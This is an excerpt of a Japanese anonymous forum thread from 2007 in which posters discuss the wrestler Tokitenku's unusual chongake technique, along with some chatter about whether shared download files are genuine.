82 :待った名無しさん:2007/01/19(金) 23:34:09
時天空もすごいがアナウンサーもすごい。

83 :待った名無しさん:2007/01/19(金) 23:36:35
時天空が上手いんじゃない!寛さんが下手すぎるんだ!

84 :待った名無しさん:2007/01/19(金) 23:53:02
なにその負け惜しみ

85 :待った名無しさん:2007/01/20(土) 01:05:57
ちょんがけ

86 :待った名無しさん:2007/01/20(土) 01:15:30
右足一本というかそれと連動した右腕の使い方も素晴らしいね。最初に相手の差し手を
抱え上げながら相手の左膝の裏を蹴り、返す刀で相手の首を抱えながら相手の右足の
かかとに絡みつくという流れ。

これは相撲史に残る変態技になると思う。

87 :待った名無しさん:2007/01/20(土) 01:44:28
ここらでちょっと頭を使ってみよう。

偽物だ、本物だ、という書き込みは必ず発生するが、これらの書き込みの真相には四つのパターンがある。
・実際本物であり、「本物だよ」と書き込む。
・実際は偽物であるが、「本物だよ」と書き込む。
・実際偽物であり、「偽物だよ」と書き込む。
・実際は本物であるが、「偽物だよ」と書き込む。

この中には、実際に行われる可能性が低いものがある。
・実際は偽物であるが、「本物だよ」と書き込む。
これだけである。

他の三つには、そう書き込んだものにとっての具体的な理由がある。
・実際本物であり、「本物だよ」と書き込む。
これは、「皆さん安心して落としていいよ」という善意の書き込み。

・実際偽物であり、「偽物だよ」と書き込む。
これは、「偽物だから落としちゃダメだよ」という善意の書き込み。

・実際は本物であるが、「偽物だよ」と書き込む。
そしてこれは、本物を落とされては困る人間(誰なのかは察してくれ)の書き込み。

だが、
・実際は偽物であるが、「本物だよ」と書き込む。
この書き込みには、「人を騙したい」という悪戯心、遊び心しか存在しないのである。
この書き込みを信じ、ダウンロードした者がいたとしても、書き込んだ人間には物理的な利益は全くない。
このような理由から、こういった書き込みが行われる可能性は低いといえる。

上のことを踏まえるとつまり、
「偽物だよ」という書き込みからは事実は読み取りにくいが、
「本物だよ」という書き込みが行われれば実際に本物である可能性が高い。
こういえるのである。

88 :待った名無しさん:2007/01/20(土) 03:35:18
>>81
dくす!
保存しますた。

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)